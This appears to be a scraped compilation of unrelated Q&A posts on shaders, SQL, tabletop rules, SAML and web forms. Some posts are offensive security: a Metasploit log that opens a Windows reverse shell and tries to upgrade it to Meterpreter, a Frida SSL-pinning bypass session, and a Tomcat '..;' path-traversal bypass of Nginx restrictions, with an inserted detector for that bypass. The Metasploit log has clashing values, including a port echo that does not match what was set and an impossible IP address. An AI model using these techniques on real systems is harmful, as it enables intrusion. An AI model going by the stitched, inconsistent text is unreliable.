Per-object screen space uv issue

I am currently trying to sample a texture in screen space. This works well:

    float4 positionCS = vertexInput.positionCS / vertexInput.positionCS.w;
    screenPos = ComputeScreenPos(positionCS).xy;
    float aspect = _ScreenParams.x / _ScreenParams.y;
    screenPos.x = screenPos.x * aspect;

But I would like to be able to constrain uv position and scale based on the object’s position and distance from the camera. I found some examples, but I also faced some issues, and for the moment I don’t see how to fix them. Here’s the code:

    float4 positionCS = vertexInput.positionCS / vertexInput.positionCS.w;
    screenPos = ComputeScreenPos(positionCS).xy;
    float aspect = _ScreenParams.x / _ScreenParams.y;
    screenPos.x = screenPos.x * aspect;

    float4 originCS = TransformObjectToHClip(float3(0.0, 0.0, 0.0));
    originCS = originCS / originCS.w;
    float2 originSPos = ComputeScreenPos(originCS).xy;
    originSPos.x = originSPos.x * aspect;
    screenPos = screenPos - originSPos;

    // You can match object's distance like this
    float3 cameraPosWS = GetCameraPositionWS();
    float3 originPosWS = TransformObjectToWorld(float4(0.0, 0.0, 0.0, 1.0));
    float d = distance(float4(0.0, 0.0, 0.0, 0.0), cameraPosWS - originPosWS);
    screenPos *= d;

And here’s the issue I am facing. You can notice that when the object is near the screen edges, the texture starts to move. Is there a way to avoid that?

I am using URP but this doesn’t really matter.

Metasploit: Issue with upgrading a low privilege shell (sessions -u)

Setup info: I don’t believe this is the issue, as I regularly update my system. I’ll add one piece of information as an example. If you would really like to see the rest, then I can add more later.

metasploit v5.0.89-dev

Payload: I used a custom Python script to create a reverse shell from the victim’s computer to the attacker. No problem with the low-priv shell in netcat or Metasploit. If anyone wants to take a look at the script, I can upload it to GitHub and share the link (though it’s nothing special, I’d prefer to send the link privately to keep the script as little spread as possible).

Exact Steps I took:

    msf5 > use multi/handler
    msf5 exploit(multi/handler) > set payload windows/x64/shell_reverse_tcp
    payload => windows/x64/shell_reverse_tcp
    msf5 exploit(multi/handler) > set LPORT 549
    LPORT => 443
    msf5 exploit(multi/handler) > set LHOST 10.8.210.314
    LHOST => 10.9.139.110
    msf5 exploit(multi/handler) > run

    [*] Started reverse TCP handler on 10.9.139.110:443
    [*] Command shell session 1 opened (10.9.139.110:443 -> 10.9.0.1:50071) at 2020-05-30 22:31:25 -0400

    Login: password
    You have a shell have fun
    #> background

    Background session 1? [y/N]  y
    msf5 exploit(multi/handler) > sessions -u 1
    [*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

The Issue:

    [*] Upgrading session ID: 1
    [*] Starting exploit/multi/handler
    [*] Started reverse TCP handler on 10.9.139.110:4433
    [-] Post failed: NoMethodError undefined method `reverse!' for nil:NilClass
    [-] Call stack:
    [-]   /usr/share/metasploit-framework/lib/msf/core/session/provider/single_command_shell.rb:136:in `shell_command_token_win32'
    [-]   /usr/share/metasploit-framework/lib/msf/core/session/provider/single_command_shell.rb:84:in `shell_command_token'
    [-]   /usr/share/metasploit-framework/lib/msf/core/post/common.rb:147:in `cmd_exec'
    [-]   /usr/share/metasploit-framework/lib/msf/core/post/windows/powershell.rb:32:in `have_powershell?'
    [-]   /usr/share/metasploit-framework/modules/post/multi/manage/shell_to_meterpreter.rb:161:in `run'

Note: I have taken a look at some of the files, but they seem to be coded in Ruby (something I am not familiar with) and the error seems to be related to multiple files, so I have no clue how to really debug this. There also seem to be similar issues posted on GitHub, if it helps.

How can I track down an issue with a locked table, endless query?

I have a table that is periodically getting locked in a manner that I don’t quite understand. I cannot do the following:

    select * from thetable
    select count(*) from thetable

There are roughly 2,000 records.

I can do the following:

    select top 2000 * from thetable
    select * from thetable where ID = etc.

Going backwards to find a new record that perhaps was problematic, incrementing the count in chunks until I can finally reproduce it again:

    select top 1500 * from thetable order by ID desc
    select top 1550.... etc.

and eventually it gets locked and never finishes the query.

Query never finishes… have waited 10 minutes. Only resolution is to restart the service.

The related stored procedure that I thought caused the problem I ran manually (it interacts with this table) and the longest time it took was roughly 45 seconds. This particular procedure goes through many phases and is wrapped in a transaction with a try/catch/rollback/commit. There is no explicit locking set on the procedure.

Any direction or guidance to track down the root issue is greatly appreciated.

Can a wizard under the effects of Feign Death issue telepathic commands to their familiar?

A wizard has a summoned familiar within 100 feet that is currently idle and has Feign Death cast on them by another PC. Would the wizard still be able to issue telepathic commands to their familiar?

Specifically, while Feign Death states that they appear dead and are incapacitated and blind, they aren’t listed as being unconscious.

Find Familiar doesn’t state that issuing telepathic commands requires an action (which you can’t do while incapacitated), whereas it does state that seeing through your familiar’s eyes requires an action as does dismissing it.

I was DMing a game where this occurred and I hastily ruled that the wizard was unable to issue commands, but I am second guessing myself after the fact. And knowing my PCs this situation is likely to happen again.

A SQL query optimization issue with ORDER BY


Current status

I have a database of Chess games and their corresponding moves (stored as strings called fens). I have two main tables ‘Game’ and ‘GamePosition’. GamePosition has an index on the fen column and Game has an index on white_elo. I currently have 170471 games and 14813401 positions. I’m running MySQL 5.7.28.

Object

I’m trying to fetch top rated games based on elo rating of the players. I’ve simplified my query a bit here, but the point and performance problem is the same.

    SELECT Game.id
    FROM Game
    JOIN GamePosition ON Game.id = game_id
    WHERE fen = 'rnbqkbnr/pppppppp/8/8/3P4/8/PPP1PPPP/RNBQKBNR'
    ORDER BY white_elo DESC
    LIMIT 10

This query tends to be a bit slow (1.2 s) if I get a lot of results (typically the first move gives 67k+ results). Since I plan to expand the database 10x at least, I want to optimize my query. I’ve run an EXPLAIN which shows that it needs to do a filesort before finding the top rated games on all the results. This seems to be the issue. Removing the ORDER BY from the query makes it superfast (0.0008 s).

Any ideas if it’s possible to optimize the query, or if I could store the data differently?

Kind Regards, Bjorn

Path normalization issue with semicolon in Tomcat

I have observed a path normalization issue in Tomcat when I was passing “..;” in the URL. I tested this out with Nginx and Apache-tomcat-10.0.0-M4. I was able to access file directories which are not allowed in the Nginx. Please find the below screenshots for more information,

  1. Nginx Configuration:


As per the above configuration, I have enabled the /app/ context path only in Nginx.

  2. I created two directories called App (contains test.html) and App2 (contains test2.html) in the Tomcat ROOT directory.


  3. As per the above Nginx configuration, it allows access only to app/test.html. But using a semicolon, it is possible to access the app2/test2.html file as well.

Normal behavior


Behavior with the semicolon


As per the above screenshot, it is allowed to access the test2.html page via Nginx with a semicolon even though the app2 context path is not defined in the Nginx configuration. Also, please note that I checked this behavior without the Nginx and noted the same behavior. I was able to reproduce this issue directly in Tomcat 9.0.12 and Tomcat 10.0.0-M4.


Is this already a known issue? Or is this the normal behavior at the Tomcat level? A similar issue has been discussed at Black Hat (see below link for more details).
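
The mismatch described in the question above, as an added example (not part of the original post, and not Nginx or Tomcat code): a simplified model of how a front end that treats `;` as an ordinary character and a backend that strips `;parameters` before resolving `..` see the same request path, with a check that flags requests where the two disagree about the `/app/` prefix. The function names and sample paths are constructed for illustration, and the front-end behaviour is an assumption because the Nginx configuration is not shown on the page.

```python
from urllib.parse import unquote

ALLOWED_PREFIX = "/app/"  # the only context path the front end exposes (from the post)

def _resolve(segments):
    """Resolve '.' and '..' segments and return an absolute path."""
    out = []
    for seg in segments:
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
        else:
            out.append(seg)
    return "/" + "/".join(out)

def proxy_view(raw_path):
    """Assumed front-end behaviour: decode, then resolve dot-segments.
    ';' is an ordinary character, so '..;' is just a directory name."""
    return _resolve(unquote(raw_path).split("/"))

def backend_view(raw_path):
    """Simplified servlet-container model: drop ';params' from every
    segment first, then decode and resolve dot-segments."""
    stripped = (seg.split(";", 1)[0] for seg in raw_path.split("/"))
    return _resolve(unquote(seg) for seg in stripped)

def escapes_prefix(raw_path, prefix=ALLOWED_PREFIX):
    """True when the front end would route the request under `prefix`
    but the backend would serve a path outside it."""
    return (proxy_view(raw_path).startswith(prefix)
            and not backend_view(raw_path).startswith(prefix))

# Constructed request paths, as they would appear in an access log.
SAMPLE_PATHS = [
    "/app/test.html",
    "/app/sub/../test.html",             # ordinary dot-segment, stays in /app/
    "/app/test.html;jsessionid=ABC123",  # ordinary path parameter
    "/app/..;/app2/test2.html",          # the '..;' form from the post
]

def flagged(paths=SAMPLE_PATHS):
    """Return the paths whose front-end and backend views disagree."""
    return [p for p in paths if escapes_prefix(p)]

if __name__ == "__main__":
    for p in SAMPLE_PATHS:
        print(f"{p!r:40} proxy={proxy_view(p)!r} backend={backend_view(p)!r}")
    print("flagged:", flagged())
```

The check compares the two interpretations rather than matching on `;` alone, so an ordinary `;jsessionid=` parameter is not flagged.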

Bypassing SSL pinning Using Frida issue

I am a penetration tester, and I was doing some SSL pinning bypass using Frida.

I have pushed all the required files and certificates, and Burp is intercepting traffic from the Android Studio emulator.

I have performed the steps to run Frida:

    [Android Emulator 5554::com.*****.**** ( flagged for ethical security reasons )]->
    [.] Cert Pinning Bypass/Re-Pinning
    [+] Loading our CA...
    [o] Our CA Info: CN=PortSwigger CA, OU=PortSwigger CA, O=PortSwigger, L=PortSwigger, ST=PortSwigger, C=PortSwigger
    [+] Creating a KeyStore for our CA...
    [+] Creating a TrustManager that trusts the CA in our KeyStore...
    [+] Our TrustManager is ready...
    [+] Hijacking SSLContext methods now...
    [-] Waiting for the app to invoke SSLContext.init()...

And when I try to interact with the application, the application is not allowing my request through because of the missing certificate, and Frida is not capturing the request and bypassing the pinning, knowing that I have performed all the right steps.

I am here if anyone needs to ask more questions. Can you please help with the above?

Issue with SSO SAML2 implementation with Apereo CAS from Sisense

I am facing an issue implementing an SP-initiated workflow using Sisense as the SP and Apereo CAS version 5.1.2 as the IdP.

This is the SP metadata

    <md:EntityDescriptor xmlns:md="urn:oasis:names:tc:SAML:2.0:metadata" validUntil="2021-01-28T18:12:42Z" cacheDuration="PT604800S" entityID="https://sisense.domain.com/app/main#/home">
      <md:SPSSODescriptor AuthnRequestsSigned="false" WantAssertionsSigned="false" protocolSupportEnumeration="urn:oasis:names:tc:SAML:2.0:protocol">
        <md:KeyDescriptor use="signing">
          <ds:KeyInfo xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
            <ds:X509Data>
              <ds:X509Certificate>MIIDGT..</ds:X509Certificate>
            </ds:X509Data>
          </ds:KeyInfo>
        </md:KeyDescriptor>
        <md:KeyDescriptor use="encryption">
          <ds:KeyInfo xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
            <ds:X509Data>
              <ds:X509Certificate>MIIDG...</ds:X509Certificate>
            </ds:X509Data>
          </ds:KeyInfo>
        </md:KeyDescriptor>
        <NameIDFormat>urn:oasis:names:tc:SAML:2.0:nameid-format:emailAddress</NameIDFormat>
        <md:AssertionConsumerService Binding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST" Location="https://sisense.domain.com/api/v1/authentication/login_saml_callback/" index="1"/>
      </md:SPSSODescriptor>
    </md:EntityDescriptor>

On the SP side the following configurations are expected.

Remote Login URL – https://cas.com:8443/cas/idp/profile/SAML2/Redirect/SSO

Remote Logout URL – https://cas.com:8443/cas/logout

X509 certificate – certificate from the IdP

On the CAS server I have configured the service definition for CAS as JSON:

    {
      "@class" : "org.apereo.cas.support.saml.services.SamlRegisteredService",
      "serviceId" : "https://sisense.domain.com/app/main#/home",
      "name" : "SAMLService",
      "id" : 10000012,
      "evaluationOrder" : 10,
      "metadataLocation" : "https://localhost:8443/cas/etc/cas/saml/sisense_metadata.xml",
      "usernameAttributeProvider" : {
        "@class" : "org.jasig.cas.services.PrincipalAttributeRegisteredServiceUsernameProvider",
        "usernameAttribute" : "cn"
      }
    }

When the workflow is initiated by calling this URL, https://sisense.domain.com/app/main#/home, the SP redirects to the CAS SSO endpoint with the following SAMLRequest:

    <samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
                        ID="_6f357780b767b788a3c0"
                        Version="2.0"
                        IssueInstant="2020-04-28T10:48:35.405Z"
                        ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST"
                        AssertionConsumerServiceURL="https://sisense.domain.com/api/v1/authentication/login_saml_callback/"
                        Destination="https://cas.com:8443/cas/idp/profile/SAML2/Redirect/SSO"
                        >
        <saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">https://sisense.domain.com/app/main#/home</saml:Issuer>
        <samlp:NameIDPolicy xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
                            Format="urn:oasis:names:tc:SAML:2.0:nameid-format:emailAddress"
                            AllowCreate="true"
                            />
        <samlp:RequestedAuthnContext xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
                                     Comparison="exact"
                                     >
            <saml:AuthnContextClassRef xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml:AuthnContextClassRef>
        </samlp:RequestedAuthnContext>
    </samlp:AuthnRequest>

I don’t get the login screen for CAS; instead I get a 500 Internal Server Error with the error message:

    Handler dispatch failed; nested exception is java.lang.NoSuchMethodError: org.jasig.cas.client.util.CommonUtils.constructServiceUrl(Ljavax/servlet/http/HttpServletRequest;Ljavax/servlet/http/HttpServletResponse;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Z)Ljava/lang/String;

I am unable to proceed; any help is appreciated.

Thanks

Issue: Mouse Wheel Up and Down changes the value in a field

Hey, I have a PHP website platform. On certain pages there are fields where users can enter values. Critical amounts with 2 decimal points…

I am finding that if the mouse is in a certain position and the mouse wheel scrolls up or down, it is able to change the value of the 2 decimal point amount!!!

This is a big risk for data input.

Just wondering, is there a way to disable or get rid of this for all users that visit the website?